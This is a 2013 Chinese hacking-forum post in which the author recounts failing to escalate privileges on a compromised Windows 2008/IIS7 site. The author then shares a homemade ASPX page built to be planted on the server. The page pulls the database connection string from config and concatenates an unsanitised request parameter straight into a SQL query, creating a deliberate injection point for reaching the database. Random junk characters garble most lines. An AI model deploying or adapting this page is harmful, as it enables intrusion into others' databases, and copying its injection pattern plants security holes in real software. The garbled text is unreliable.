昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。5 ~* a; j* r# @% `
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。5 h0 _' `1 U! V9 ]/ c' t" Z
代码量不多,自己写个拉倒了。烦死了。+ J0 T( {1 b B( f3 o- t- n' e
3 O. f, @9 D l! o" }' k
# F: y+ W0 _. F" i<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
* a% A/ y$ b- u# }, X/ s3 G<html xmlns="http://www.w3.org/1999/xhtml">
1 W S B: V J' q3 e7 S3 d" v<head runat="server">/ C# L) M5 o& |) G9 g% x: Q/ U) b. _
<title>暗影aspx构造注射专用页面</title>
2 S# e7 ^* ~1 l5 d! y. k) k</head>: ~( h i, R% M3 |
<body>" D: S6 @+ Q2 @0 `+ S% [- r
<form id="form1" runat="server">4 E* ~3 s' u+ C% e
<div>
9 h! r' k( W0 }5 Z# e <script language="c#" runat="server">
, ?3 ]' W7 p* ]- V$ ?& V. o
' Q" ]) u; Z1 D2 X, d void page_init(object sender, EventArgs e)" V& y0 K- m* m
{- } i" _" W* _/ H! C4 {
' V! j: T T/ Z
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();0 f! ^' X0 X$ `- ?" u' W
# T5 C4 h$ m1 F) { conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
7 ], y4 S* G. ]+ K8 t& P0 P9 B conn.Open();
. l1 W* Y3 K0 Y8 s + a3 b4 A/ G8 a D$ A5 b3 @
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=17 [9 b% l# I" _* }
0 b" e; R O% M. P* f% E" v
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);+ i2 l! h) |3 [2 A2 P8 E% j" i1 Y* @
int x = command.ExecuteNonQuery();( u- M$ B! l4 Y; t& K
Response.Write(i+"\n");
; z# w' q9 y3 [1 j. {/ \0 V9 j Response.Write(x);$ }; @5 u- r' x
conn.Close();" Z5 F* a }! E3 }' ~$ [
}
+ k- r; ?3 U2 `; q; t1 [
9 ?7 \6 K! U- h# X. ` </script>* `/ A5 B8 k! P0 E7 x" O, f
</div>" p# x9 a3 `9 T8 R# d6 g+ M
</form># ?0 }: F! R1 |! @; c. h5 v# p
</body>2 V% h! m$ k* E" f
</html>3 M3 _$ `" @! k/ r$ W
|
发表于 2013-3-20 21:32:01
收藏
支持
反对